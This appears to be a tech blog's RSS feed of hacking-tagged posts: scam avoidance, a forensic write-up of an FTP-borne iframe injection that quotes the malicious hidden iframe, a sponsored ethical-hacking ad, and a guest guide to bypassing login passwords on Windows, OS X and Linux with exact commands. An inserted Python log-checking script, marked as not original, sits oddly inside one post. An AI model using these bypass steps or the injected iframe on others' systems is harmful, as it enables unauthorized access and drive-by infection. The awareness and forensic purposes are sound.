<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Joe Tech &#187; hacking</title>
	<atom:link href="http://www.joetech.com/tag/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.joetech.com</link>
	<description>Gadget reviews, technology news, software reviews, cool tech news</description>
	<lastBuildDate>Fri, 03 Feb 2012 20:18:36 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.4</generator>
		<item>
		<title>How To Avoid Online Scams</title>
		<link>http://www.joetech.com/how-to-avoid-online-scams/</link>
		<comments>http://www.joetech.com/how-to-avoid-online-scams/#comments</comments>
		<pubDate>Mon, 24 Jan 2011 00:03:44 +0000</pubDate>
		<dc:creator>Joe Tech</dc:creator>
				<category><![CDATA[Computers]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[avoid]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[online]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[safe]]></category>
		<category><![CDATA[scams]]></category>
		<category><![CDATA[spot]]></category>

		<guid isPermaLink="false">http://www.joetech.com/?p=2456</guid>
		<description><![CDATA[In 2009, I wrote What Is Phishing And How To Avoid Online Scams. While the information in that article is still very valid and worth a read, I thought I should follow up with an updated guide on how to spot and avoid scams online.
]]></description>
			<content:encoded><![CDATA[<p>In 2009, I wrote <a href="http://www.joetech.com/what-is-phishing-and-how-to-avoid-online-scams/">What Is Phishing And How To Avoid Online Scams</a>.  While the information in that article is still very valid and worth a read, I thought I should follow up with an updated guide on how to spot and avoid scams online.</p>
<p><img src="http://www.joetech.com/wp-content/uploads/2008/01/burlgar.jpg" alt="creeper" /></p>
<h3>Social Engineering And Phishing</h3>
<p>Phishing is the act of fishing for sensitive information from a target.  This is usually done by baiting the hook with either something very tempting or a sense of urgent attention needed to something they value.  Social Engineering is the art of getting someone to do what you want using only creative manipulation.  Phishing is more closely associated with fraud and illegal activities.  Social Engineering can be used in Phishing and hacking, but is also useful in many legal and morally neutral situations.</p>
<p>Examples of phishing largely include those fake bank and PayPal emails everyone eventually gets.  Usually, the email will report that they are upgrading security or that your account is frozen (or in danger of being frozen).  The quality of the email lends to how believable it is and can vary widely, but the goal is always the same.  The sender wants you to feel the urgency to log into your account to prevent a threatened interruption in your access to your money.  Similarly, you may have seen emails, seemingly from Facebook, telling you that you need to log in to keep your account open or for some other immediate reason.  Don&#8217;t narrow your suspicion to just these examples, though.  This type of bait email can apply to anything from your banking site to your Amazon wish list.  Phishing isn&#8217;t just for a username and password, either.  The rule of thumb is that any piece of information (or pieces in combination) that should be considered sensitive should be guarded carefully and you should think twice before giving anyone this information.</p>
<p>Social Engineering is a little broader in concept, but is just as important to be aware of.  In fact, it may be more important to think about because your web browser can&#8217;t warn you about something suspicious when someone calls you on the phone and has a trick up their sleeve.  Social Engineering relies heavily on perception and the target&#8217;s openness to trust that perception.  For example, if a scammer calls you, sounding very professional and polite, and wants to confirm account information for your PayPal account, they are creating the perception that they are already in possession of your sensitive information and that you shouldn&#8217;t worry about giving them any of it.</p>
<p>Luring you in with something tempting is another trick people use all the time, and it&#8217;s one I fell for once, as careful as I usually am.  It may be something as simple as information about who&#8217;s viewing your Facebook profile or it could be something as tempting as a free iPad.  Either way, these scams attempt to trick you into giving your account credentials, signing up for a spammy Facebook group, or emailing a link to all your friends or worse.  In my case it was worse, but I&#8217;ll share that below.</p>
<h3>How To Spot A Scam</h3>
<p>The sad fact is that nobody can truly spot every scam.  Sadder still, is that most people don&#8217;t even think about it and could easily spot scams if they did.  For scams we can&#8217;t spot, there are some rules to live by below, but for those we can spot, there&#8217;s some easy things to look for.</p>
<p>The number one thing I always ask myself is &#8220;Did I expect this email/message/phone call?&#8221;  If I receive any form of communication, that I didn&#8217;t expect, claiming to be from my bank or anywhere that might need sensitive information confirmed in order to discuss my account, I become immediately suspicious.  About 95% of the time, I&#8217;m right and it&#8217;s a phishing attempt or a scam of some kind.</p>
<p>Who was the email sent to and who was it from?  An alarming number of people don&#8217;t pay any attention to this, assuming that the email designed to look like it came from Bank of Arizona actually did.  Sometimes, you can see the suspicious email easily and other times you may need to &#8220;View All Headers&#8221; in your email program to see the details.  In GMail, you simply hold your mouse over your name or the sender&#8217;s name.  When you can&#8217;t see who the email is to or from, it&#8217;s best to defer to the Rules to Live By below.  This applies to phone calls as well.  If my cell phone rings and I don&#8217;t recognize the number, it goes to voicemail.  Any reputable company or person worth calling back will leave a message.  No message = no call back from me.</p>
<p>With any unexpected contact, ask yourself what the end goal is.  Usually, you can elevate your suspicion depending on the apparent goal of the communication.  For example, if asked to log in somewhere or to reply with your phone number, name, address, and birth date, you should be pretty suspicious.  On the other hand, if an email just says &#8220;Welcome to Bank of Arizona&#8221; and doesn&#8217;t prompt you for any action at all, it&#8217;s probably pretty safe.</p>
<h3>Even If It Doesn&#8217;t Look Or Walk Like A Duck</h3>
<p>Sometimes, we just assume that scams are obvious when we&#8217;ve fallen for them because our Facebook accounts get hacked or our bank accounts get drained.  Unfortunately, not all scams look like scams, even after you&#8217;ve fallen for them.  My wife and I came upon a couple great reminders of this while searching for a new place to live recently.</p>
<p>While looking on Craigslist for a house to rent, Michelle found a house that was listed for about half the monthly rent she&#8217;d expect.  Curious, she searched for the address on Google and found it listed by a realty company in several places with a more realistic rent requirement.  The realtor confirmed that the Craigslist ad was not posted by them.  The most likely scenario is that someone responds to the ad, eventually paying deposits and first month&#8217;s rent only to find that the key doesn&#8217;t work in the lock.</p>
<p>Later, Michelle found another home listed for a too-good-to-be-true price and emailed to inquire about the exact location and how we could drop by for a walk-through.  The response she received indicated that the owner was worried about dealing with strangers on Craigslist and could only arrange a walk-through and give out the exact address after a potential renter got a credit check at a site that the email linked to.  Although the credit check site is legit, the scam is that there&#8217;s no home to rent.  If we get the credit check, the person who listed the ad gets a referral commission and would probably then email and say that the house had been rented or some other excuse.  This type of scam happens all the time with domain sales&#8230; &#8220;I want to buy your domain name, but I need you to get it appraised at this site first.&#8221;  I recognized it right away, having seen it when selling domains, but I imagine a lot of people fell for it and still don&#8217;t know they were scammed.</p>
<h3>Rules To Live By</h3>
<p>I&#8217;ve been online since Yahoo was just a couple hundred links organized by a couple guys in a dorm room, and in my time online, I&#8217;ve developed some rules that I live by to help keep me out of trouble.  While these rules help me avoid phishing scams, they have also helped in keeping viruses away from my computer and I think they&#8217;re just good rules to live by, if just a little paranoid.</p>
<p>1. If I don&#8217;t expect it, I don&#8217;t trust it.  I touched on this above, but I think it&#8217;s the number one defense I live by, so I&#8217;ll mention it again.  If you get an email from someone and it has a file in it, call them and ask.  If it really is the &#8220;funniest thing [they've] ever seen&#8221;, they&#8217;ll get to enjoy your laughter over the phone.  If it&#8217;s an email from your bank, PayPal, Facebook, Ebay, etc. just go to a browser and manually type in the URL or use your existing bookmark.  This way, you&#8217;re sure you&#8217;re on the real site and if it really is important, you&#8217;ll probably have a notification in your account, too.  It&#8217;s when you just blindly trust everything that comes your way that you open yourself up to scams.</p>
<p>2. Look at the URL. Most of the phishing emails I see would have you click on a link to log in somewhere.  While I don&#8217;t think you should ever click on an email link to log in to an account, some links are just way easier to click.  For these, don&#8217;t just look at what&#8217;s on the surface.  Mouse over the link and see what the real URL is.  Watch out for domains like login.facebook.com.ru or www.bankofarizona.com.cn.  As clever as these fake domains are, they&#8217;re easy enough to spot if you take a second to look.</p>
<p>3. Use the tools available to you.  Use anti-virus software and malware detection.  You wouldn&#8217;t leave your car unlocked with your wallet in it, would you?  You shouldn&#8217;t leave your computer wide open to this stuff.  There&#8217;s even free anti-virus software out there and most modern browsers will warn you if you try to visit a site that they deem suspicious.  Listen to your browser and your instincts.</p>
<p>4. If it looks too good to be true&#8230; You know the saying.  &#8220;If it looks too good to be true, it probably is.&#8221;  To be fair, the occasional internet goodies are out there.  I have gotten free iPods and PlayStations before, but most of the time, those things are scams.  Don&#8217;t be so greedy that you dive in head first without looking.  Weigh what you have to do and information you have to give against the prize.  Aside from contests, nothing is truly free.  If the promise is for an iPad with no signing up friends, no purchase and no random drawings, it&#8217;s probably a scam.</p>
<h3>Damage Control</h3>
<p>You are not perfect.  Chances are that one day, you&#8217;ll slip and give someone what they&#8217;re phishing for.  I did.  I feel a little dumb even admitting it, but I once gave out my debit card pin online in response to an email that I&#8217;d won an XBox and just had to cover the shipping myself.  I have my rules, I can usually see scams, and I think I&#8217;m pretty smart.  Still, I got suckered in, thinking I&#8217;d won and getting excited at the idea of a free game system.  As bad as that is, it could have been worse.  I could have just prayed nothing would happen, hoping to avoid having to cancel a card or I could have been too embarrassed to call my bank.  Instead, as embarrassed as I was, I called my bank only minutes after sending the email and admitted that I&#8217;d been suckered and needed to cancel the card.  I felt really dumb, but more importantly, I felt relieved that I had reversed the problem quickly by canceling my card.</p>
<p>If you get scammed, don&#8217;t let your pride get in the way of the damage control.</p>
<h3>Help Others</h3>
<p>The internet is a giant community.  When you see scams, report them.  I always forward phishing emails to the real companies the email is disguised as.  They have incredible incentive to go after the scammers and usually do.  Don&#8217;t stop there, either.  Most of you have a lot of friends online.  Let them know about any phishing scams going around.  I&#8217;d rather a friend be quietly aware of scams than hear that they fell for one I could have warned about.</p>
<p>On that note, use the comment form below to tell us about scams you&#8217;ve come across or any tips you have for staying safe online.  And don&#8217;t forget to &#8220;Share&#8221; and &#8220;Like&#8221; this article on Facebook.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.joetech.com/how-to-avoid-online-scams/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Tracking And Stopping Web Site IFRAME Code Injection</title>
		<link>http://www.joetech.com/tracking-and-stopping-web-site-iframe-code-injection/</link>
		<comments>http://www.joetech.com/tracking-and-stopping-web-site-iframe-code-injection/#comments</comments>
		<pubDate>Sat, 25 Apr 2009 17:27:41 +0000</pubDate>
		<dc:creator>Joe Tech</dc:creator>
				<category><![CDATA[Computers]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[compromised]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[logs]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.joetech.com/?p=968</guid>
		<description><![CDATA[Yesterday, I wrote about getting paid to hack. Part of what I talked about was computer forensics. Earlier in the day, I was presented with an opportunity to practice my own IT security skills. Below, I&#8217;ll explain what happened to my client, how an employee of mine and I found the source of the problem [...]
]]></description>
			<content:encoded><![CDATA[<p>Yesterday, I wrote about <a href="http://www.joetech.com/2009/04/24/get-paid-to-hack/">getting paid to hack</a>.  Part of what I talked about was computer forensics.  Earlier in the day, I was presented with an opportunity to practice my own IT security skills.  Below, I&#8217;ll explain what happened to my client, how an employee of mine and I found the source of the problem and what we did to fix it.</p>
<p><a href="http://www.flickr.com/photos/nodomain1/3473102101/" title="Log file by nodomain1, on Flickr"><img src="http://farm4.static.flickr.com/3330/3473102101_bc96b038b5_o.jpg" width="455" height="158" alt="Log file" /></a></p>
<p><strong>Discovering a problem</strong><br />
A client called, complaining that the content management system we built for them was not working properly, so one of the developers took a look at the code and immediately alerted me to a problem.  When he looked at the code, he discovered two extra lines at the end.  The lines were similar to the following and existed at the bottom of every index.php file in the site:</p>
<blockquote><p>&lt;iframe src=&#8221;http: //lotmachinesguide .cn/ in.cgi?income56&#8243; width=1 height=1 style=&#8221;visibility: hidden&#8221;&gt;&lt;/iframe&gt;</p></blockquote>
<p>My first thought was that someone hacked in and changed the files.  What about the rest of the server?  This is where you get that sick feeling in your stomach and hope it&#8217;s not as bad as it could be.  I emailed my wife and told her I&#8217;d be unavailable via phone/email/etc. for the next few hours.</p>
<p><strong>Finding the cause</strong><br />
Tracking down the source of a hack or code injection like this can often be tricky.  How tricky it is depends on your individual skill set, past experiences, and the complexity of the problem, itself.  This one turned out to be easy, partially because I&#8217;ve done this before and know many of the places to look, but mostly because it wasn&#8217;t really a hack.  Not locally, anyway.  One of my developers and I sat down in my office and I started looking at the hacked files.  Using the following command (from the client&#8217;s web root), I displayed a list of all files that were modified that day:</p>
<p><code>ls -laR |grep "Apr 24"</code></p>
<p>What it returned was a list of the index files I was already aware of.  Good.  I then ran the same command on other sites to be sure this was isolated and it was.  Next, I checked &#8220;last&#8221; to see who&#8217;s been logging into my server:</p>
<p><code>last |grep [client username redacted] |grep Apr</code></p>
<p>Last shows all the recent logins from SSH, FTP, etc.  Immediately, I noted a large number of FTP connections for the client site I was investigating, which looked suspicious.  I headed to my FTP log files and grepped my &#8220;secure&#8221; log files for &#8220;Incorrect&#8221;:</p>
<p><code>grep Incorrect /var/log/secure*</code></p>
<p>Your system may use something other than &#8220;Incorrect&#8221; to indicate a bad login and your &#8220;secure&#8221; log file location may vary.  This grep showed only a few bad attempts, which is fairly normal and not what I expected to see if the account had been brute-forced.  I moved on to the FTP log file to see what transfers were made.  You&#8217;ll need to find your own FTP log location if you don&#8217;t know where it is already.</p>
<p><code>grep "Apr 24" xferlog*</code></p>
<p>I did this mostly to confirm that I was on the right track, but it uncovered even more oddness.  Here&#8217;s a bit of what I saw:</p>
<blockquote><p>Fri Apr 24 11:17:32 2009 0 [ip redacted] 4289 /var/www/vhosts/[domain redacted]/httpdocs/index.php a _ o r [username redacted] ftp 0 * c<br />
Fri Apr 24 11:17:38 2009 2 [ip redacted] 4402 /var/www/vhosts/[domain redacted]/httpdocs/index.php a _ i r [username redacted] ftp 0 * c<br />
Fri Apr 24 11:17:51 2009 0 [ip redacted] 2836 /var/www/vhosts/[domain redacted]/httpdocs/admin/index.php a _ o r [username redacted] ftp 0 * c<br />
Fri Apr 24 11:17:56 2009 0 [ip redacted] 2949 /var/www/vhosts/[domain redacted]/httpdocs/admin/index.php a _ i r [username redacted] ftp 0 * c
</p></blockquote>
<p>For each index file that had the iframe HTML added to the end, there was a download and then an upload five or six seconds later.  The speed indicated that it was a script and the fact that it was all done via FTP indicated that if there was a compromised computer somewhere, it was remote and my server was safe.</p>
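<p>An added example (not from the original post): a Python script that automates the xferlog check described above, pairing each FTP download with a re-upload of the same file by the same host and user a few seconds later and reporting how many bytes the file grew.  The log lines are constructed from the excerpt, with a placeholder host, user and domain, and the 30-second window is an assumed threshold.</p>

```python
"""Flag FTP download-then-reupload pairs in an xferlog (added example)."""
from collections import Counter
from datetime import datetime

# Constructed sample in xferlog format, modelled on the excerpt above.
# The host (203.0.113.10, a documentation address), the user "clientuser"
# and the domain example.com are placeholders, not values from the incident.
SAMPLE_XFERLOG = """\
Fri Apr 24 09:02:11 2009 1 203.0.113.10 18211 /var/www/vhosts/example.com/httpdocs/docs/report.pdf b _ i r clientuser ftp 0 * c
Fri Apr 24 11:17:32 2009 0 203.0.113.10 4289 /var/www/vhosts/example.com/httpdocs/index.php a _ o r clientuser ftp 0 * c
Fri Apr 24 11:17:38 2009 2 203.0.113.10 4402 /var/www/vhosts/example.com/httpdocs/index.php a _ i r clientuser ftp 0 * c
Fri Apr 24 11:17:51 2009 0 203.0.113.10 2836 /var/www/vhosts/example.com/httpdocs/admin/index.php a _ o r clientuser ftp 0 * c
Fri Apr 24 11:17:56 2009 0 203.0.113.10 2949 /var/www/vhosts/example.com/httpdocs/admin/index.php a _ i r clientuser ftp 0 * c
Fri Apr 24 13:40:05 2009 0 203.0.113.10 1900 /var/www/vhosts/example.com/httpdocs/style.css a _ o r clientuser ftp 0 * c
Fri Apr 24 15:12:44 2009 0 203.0.113.10 2050 /var/www/vhosts/example.com/httpdocs/style.css a _ i r clientuser ftp 0 * c
"""


def parse_line(line):
    """Parse one xferlog line into a dict, or return None if malformed."""
    tok = line.split()
    # 5 timestamp tokens + transfer time + host + size + filename + 9 fields
    if len(tok) < 18:
        return None
    try:
        when = datetime.strptime(" ".join(tok[:5]), "%a %b %d %H:%M:%S %Y")
        size = int(tok[7])
    except ValueError:
        return None
    return {
        "time": when,
        "host": tok[6],
        "size": size,
        # A filename may contain spaces; the nine fields after it are fixed.
        "path": " ".join(tok[8:-9]),
        "direction": tok[-7],   # "o" = download, "i" = upload
        "user": tok[-5],
        "status": tok[-1],      # "c" = complete, "i" = incomplete
    }


def find_rewrites(log_text, max_gap_seconds=30):
    """Return uploads that follow a download of the same file within the window."""
    last_download = {}  # (host, user, path) -> most recent download record
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] != "c":
            continue
        key = (rec["host"], rec["user"], rec["path"])
        if rec["direction"] == "o":
            last_download[key] = rec
        elif rec["direction"] == "i" and key in last_download:
            down = last_download.pop(key)
            gap = (rec["time"] - down["time"]).total_seconds()
            if 0 <= gap <= max_gap_seconds:
                hits.append({
                    "path": rec["path"],
                    "host": rec["host"],
                    "user": rec["user"],
                    "gap_seconds": int(gap),
                    "growth_bytes": rec["size"] - down["size"],
                })
    return hits


def common_growth(hits):
    """Most frequent size increase and its count; the same increase on every
    file suggests one identical snippet was appended to each of them."""
    counts = Counter(h["growth_bytes"] for h in hits)
    return counts.most_common(1)[0] if counts else None


if __name__ == "__main__":
    found = find_rewrites(SAMPLE_XFERLOG)
    for h in found:
        print("{path}  user={user} host={host}  re-uploaded after "
              "{gap_seconds}s, +{growth_bytes} bytes".format(**h))
    print("most common growth:", common_growth(found))
```

<p>Run against a real xferlog by passing the file's contents to <code>find_rewrites</code>; the plain upload and the edit re-uploaded hours later in the sample are not reported.</p>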
<p><strong>Cleaning it all up</strong><br />
In this case, cleanup was easy.  First, I backed up all the log files for further review just in case I need them.  Then I changed the client&#8217;s FTP password.  Finally, I pulled the latest (clean) versions of the affected index.php files from our subversion repository and uploaded them back to the site.</p>
<p><strong>Preventing future occurrences</strong><br />
I wanted to find out exactly how someone who should clearly not have the client&#8217;s FTP credentials wound up with them.  My theory was that the client&#8217;s computer had been compromised.  I headed to <a href="http://www.arin.net">arin.net</a> and used their handy IP whois tool to see who the one prominent IP address from the log files belonged to.  It turned out to be a COX IP registered to Atlanta, GA.  We called the client and asked them if they had anyone there.  They did not.  The FTP logs also showed uploads, recently, of documents that related to the client and looked to be legitimate, so we asked who uploaded them and conferenced him in.  A couple questions quickly revealed that not only was the IP their local office computers, but the computers there had been &#8220;acting funny, randomly rebooting, etc.&#8221; for the last day or so.  We sent their computer guy out to take care of the problem, which turned out to be a trojan.</p>
<p><strong>Conclusions</strong><br />
First of all, this was a very easy problem to diagnose and fix.  I&#8217;ve been on the bad end of some serious hacks and this was by no means a bad one.  For the client, however, the day proved much more frustrating.  The expense incurred from having the IT guy come out and the thought that it could have been much worse (like their site replaced with something untoward), should be a lesson to be very careful about what you download, what you click, and the sites you visit.  The best policy is to only open or run things from sites and people you trust, and even then, use caution.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.joetech.com/tracking-and-stopping-web-site-iframe-code-injection/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Get Paid To Hack</title>
		<link>http://www.joetech.com/get-paid-to-hack/</link>
		<comments>http://www.joetech.com/get-paid-to-hack/#comments</comments>
		<pubDate>Sat, 25 Apr 2009 06:31:13 +0000</pubDate>
		<dc:creator>Joe Tech</dc:creator>
				<category><![CDATA[Communication]]></category>
		<category><![CDATA[Computers]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[#CEH]]></category>
		<category><![CDATA[class]]></category>
		<category><![CDATA[council]]></category>
		<category><![CDATA[ethical hacking]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[iclass]]></category>
		<category><![CDATA[learning]]></category>
		<category><![CDATA[training]]></category>

		<guid isPermaLink="false">http://www.joetech.com/?p=945</guid>
		<description><![CDATA[One of the things I love most about computers is the ability to learn something new every day. The internet helps me do that from the comfort of my own home and gives me more options than I can shake a stick at for learning new things. You can even take classes online and not [...]
]]></description>
			<content:encoded><![CDATA[<p>One of the things I love most about computers is the ability to learn something new every day.  The internet helps me do that from the comfort of my own home and gives me more options than I can shake a stick at for learning new things.  You can even take classes online and not just the boring ones, either.  This sponsored post is about some of the coolest <a href="http://socialspark.com/metrics/click/post?slot_id=36467&#038;url=http%3A%2F%2Furlbrief.com%2F98d904" rel="nofollow">IT Security</a> classes you can take online.  Learn to hack online and then make money doing it.</p>
<p><a href="http://www.flickr.com/photos/nodomain1/3464986632/" title="Security Enforcement by nodomain1, on Flickr"><img src="http://farm4.static.flickr.com/3634/3464986632_4bf12c009e_o.jpg" width="455" height="247" alt="Security Enforcement" /></a></p>
<p><strong>Ethical Hacking</strong><br />
There&#8217;s a couple different ways to think about what hacking means.  To some people, it&#8217;s just seedy characters in seedy places trying to break into your computer and steal your identity.  While there&#8217;s people out there who do things like that, it&#8217;s not the true definition of a hacker.  A hacker is someone who thinks outside the box to obtain information and learn new things that is normally unavailable via popular channels.  That said, bad hackers are out there, but there is such a thing as <a href="http://socialspark.com/metrics/click/post?slot_id=36467&#038;url=http%3A%2F%2Furlbrief.com%2F98d904" rel="nofollow">Ethical Hacking</a>.  Since the <a href="http://socialspark.com/metrics/click/post?slot_id=36467&#038;url=http%3A%2F%2Furlbrief.com%2F98d904" rel="nofollow">EC-Council</a> site does such a good job explaining ethical hacking, I&#8217;ll let them tell you in their own words:</p>
<blockquote><p>The goal of the ethical hacker is to help the organization take preemptive measures against malicious attacks by attacking the system himself; all the while staying within legal limits.
</p></blockquote>
<p>It&#8217;s important to note that Ethical Hacking can be learned on your own, but it&#8217;s a slow road.  Besides, a <a href="http://socialspark.com/metrics/click/post?slot_id=36467&#038;url=http%3A%2F%2Furlbrief.com%2F98d904" rel="nofollow">Certified Ethical Hacker</a> is bound to have better odds making more money.  Friends of mine have done this as teams or solo projects and if you&#8217;re good, it pays well and is a lot of fun.  Now, the pay is better than ever, even in our economy.  According to a recent article on CIO.com, the pay for an ethical hacker is up 40%.  One of my friends was flown to Japan to hack in to a large company&#8217;s network and make a dramatic point about their security needs by walking into a security needs meeting in a highly secured part of the building using only his skills to gain access.  &#8220;You should have seen their faces&#8221;, he told me with a big grin.  Speaking for the other side, I manage several servers myself and I can tell you it&#8217;s a lot cheaper to pay someone to find all the holes than it is to clean up the mess that an unethical hacker can leave if you don&#8217;t.</p>
<p><strong>Roles in IT Security</strong><br />
What if you don&#8217;t think hacking is for you?  Hacking is rewarding, but there are other <a href="http://socialspark.com/metrics/click/post?slot_id=36467&#038;url=http%3A%2F%2Furlbrief.com%2F98d904" rel="nofollow">IT Security</a> roles that can also be very rewarding and they all pay well.  Some of these include pro-active positions like Security Awareness, Security Fundamentals, Advanced Penetration Testing and Application Security as well as some more re-active roles like Disaster Recovery (be the hero), and Computer Forensics (see my post tomorrow for a great real-life example of this from what I dealt with today).</p>
<p>One thing many online classes seem to miss is that a lot of people benefit vastly from the interaction with an actual instructor that a class room environment offers.  These guys know that better learning comes from the ability to talk to a real live instructor and get detailed answers to unique and specific questions.  They give you access to a real person to help you along as you go.</p>
<p>It&#8217;s really a good looking package and I just have to pound the point home&#8230; Ethical hacking and IT security is just plain rewarding financially as well as in every other way.  If you&#8217;re thinking about a career in IT, you should look into this.</p>
<p> <img src="http://ad.doubleclick.net/ad/N5654.139913.9527099420421/B3455931;sz=1x1" width="1" height="1" border="0" /></p>
<map name="map2697">
<area href="http://socialspark.com/metrics/click/disclosure?slot_id=36467&#038;url=http%3A%2F%2Furlbrief.com%2F98d904" shape="rect" coords="0,0,206,45" rel="nofollow" />
<area href="http://socialspark.com/code_of_ethics" shape="rect" coords="207,0,225,45" rel="nofollow" /></map>
<p><img alt="Post?slot_id=36467&#038;url=http%3a%2f%2fsocialspark" border="0" src="http://socialspark.com/metrics/view/post?slot_id=36467&#038;url=http%3A%2F%2Fsocialspark.com%2Fimages%2Fdisclosure_badges%2Fdisclosure_badge_grey.png" style="border:0" usemap="#map2697" /></p>


]]></content:encoded>
			<wfw:commentRss>http://www.joetech.com/get-paid-to-hack/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>How to Crack the Account Password on Any Operating System</title>
		<link>http://www.joetech.com/how-to-crack-the-account-password-on-any-operating-system/</link>
		<comments>http://www.joetech.com/how-to-crack-the-account-password-on-any-operating-system/#comments</comments>
		<pubDate>Fri, 30 Jan 2009 01:22:39 +0000</pubDate>
		<dc:creator>Joe Tech</dc:creator>
				<category><![CDATA[Computers]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[mac]]></category>
		<category><![CDATA[ophcrack]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[username]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.joetech.com/?p=610</guid>
		<description><![CDATA[This guest post was written by Blair Mathis from LaptopLogic.com &#8211; your premier source for the latest laptop software news and best laptop accessories. Computer passwords are like locks on doors &#8211; they keep honest people honest. If someone wishes to gain access to your laptop or computer, a simple login password will not stop [...]


]]></description>
			<content:encoded><![CDATA[
<p><em>This guest post was written by Blair Mathis from LaptopLogic.com &#8211; your premier source for the latest <a href="http://laptoplogic.com/laptop-accessories/laptop-software">laptop software</a> news and best <a href="http://laptoplogic.com/laptop-accessories">laptop accessories</a>.</em></p>
<p>Computer passwords are like locks on doors &#8211; they keep honest people honest. If someone wishes to gain access to your laptop or computer, a simple login password will not stop them. Most computer users do not realize how simple it is to access the login password for a computer, and end up leaving vulnerable data on their computer, unencrypted and easy to access. </p>
<p><a href="http://www.joetech.com/suggests/thuh" title="Password image by nodomain1, on Flickr"><img src="http://farm4.static.flickr.com/3418/3238029478_aa1df44c98.jpg" width="400" height="300" alt="Password image" /></a></p>
<p>Are you curious how easy it is for someone to gain access to your computer? If so, read on to see the technique one might use to figure out your computer password. </p>
<p><strong>Windows</strong><br />
Windows is still the most popular operating system, and the method used to discover the login password is the easiest. The program used is called <a href="http://ophcrack.sourceforge.net/">Ophcrack</a>, and it is free. Ophcrack is based on Slackware, and uses rainbow tables to solve passwords up to 14 characters in length. The time required to solve a password? Generally 10 seconds. The expertise needed? None. </p>
<p><a href="http://www.joetech.com/suggests/thuh" title="ophcrack by nodomain1, on Flickr"><img src="http://farm4.static.flickr.com/3423/3237188885_1527db4c72_m.jpg" width="180" alt="ophcrack" align="right" valign="top" /></a>Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via UNetbootin). Insert the CD into a machine you would like to gain access to, then press and hold the power button until the computer shuts down. Turn the computer back on and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and exit. </p>
<p>The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all the work for you. Write down the password it gives you, remove the disc, restart the computer, and log in as if it were your own machine. </p>
<p><strong>Mac</strong><br />
The second most popular operating system, OS X is no safer when it comes to password cracking than Windows. </p>
<p>The easiest method would be to use Ophcrack on this, also, as it works with Mac and Linux in addition to Windows. However, there are other methods that can be used, as demonstrated below.</p>
<p>If the Mac runs OS X 10.4, then you only need the installation CD. Insert it into the computer and reboot. When it starts up, select UTILITIES > RESET PASSWORD. Choose a new password and then use that to log in. </p>
<p>If the Mac runs OS X 10.5, restart the computer and press COMMAND + S. When at the prompt, type:</p>
<p><strong>fsck -fy</strong></p>
<p><strong>mount -uw /</strong></p>
<p><strong>launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist</strong></p>
<p><strong>dscl . -passwd /Users/UserName newpassword</strong></p>
<p>That&#8217;s it. Now that the password is reset, you can log in. </p>
<p><strong>Linux</strong><br />
Finally, there is Linux, an operating system quickly gaining popularity in the mainstream, but not so common you&#8217;re likely to come across it. Though Mac and Linux are both based on Unix, it is easier to change the password in Linux than it is in OS X. </p>
<p>To change the password, turn on the computer and press the ESC key when GRUB appears. Scroll down and highlight &#8216;Recovery Mode&#8217; and press the &#8216;B&#8217; key; this will cause you to enter &#8216;Single User Mode&#8217;. </p>
<p>You&#8217;re now at the prompt, and logged in as &#8216;root&#8217; by default. Type &#8216;passwd&#8217; and then choose a new password. This will change the root password to whatever you enter. If you&#8217;re interested in only gaining access to a single account on the system, however, then type &#8216;passwd username&#8217; replacing &#8216;username&#8217; with the login name for the account you would like to alter the password for. </p>
<p><strong>Conclusion</strong><br />
There you have it &#8211; that is how simple it is for someone to <a href="http://www.joetech.com/suggests/thuh">hack</a> your password. It requires no technical skills, no laborious tasks, only simple words or programs. The moral of the story? Encrypt your data to keep it safe. Don&#8217;t use only a password, but actual encryption, such as Blowfish or AES-128. There are a number of programs that can do this &#8211; TrueCrypt for Windows, or the native encryption found on Ubuntu, creating a disk image in Mac, etc.</p>


]]></content:encoded>
			<wfw:commentRss>http://www.joetech.com/how-to-crack-the-account-password-on-any-operating-system/feed/</wfw:commentRss>
		<slash:comments>149</slash:comments>
		</item>
		<item>
		<title>How to Hack a Person</title>
		<link>http://www.joetech.com/how-to-hack-a-person/</link>
		<comments>http://www.joetech.com/how-to-hack-a-person/#comments</comments>
		<pubDate>Thu, 24 Jan 2008 01:21:57 +0000</pubDate>
		<dc:creator>Joe Tech</dc:creator>
				<category><![CDATA[Communication]]></category>
		<category><![CDATA[Computers]]></category>
		<category><![CDATA[Just Cool]]></category>
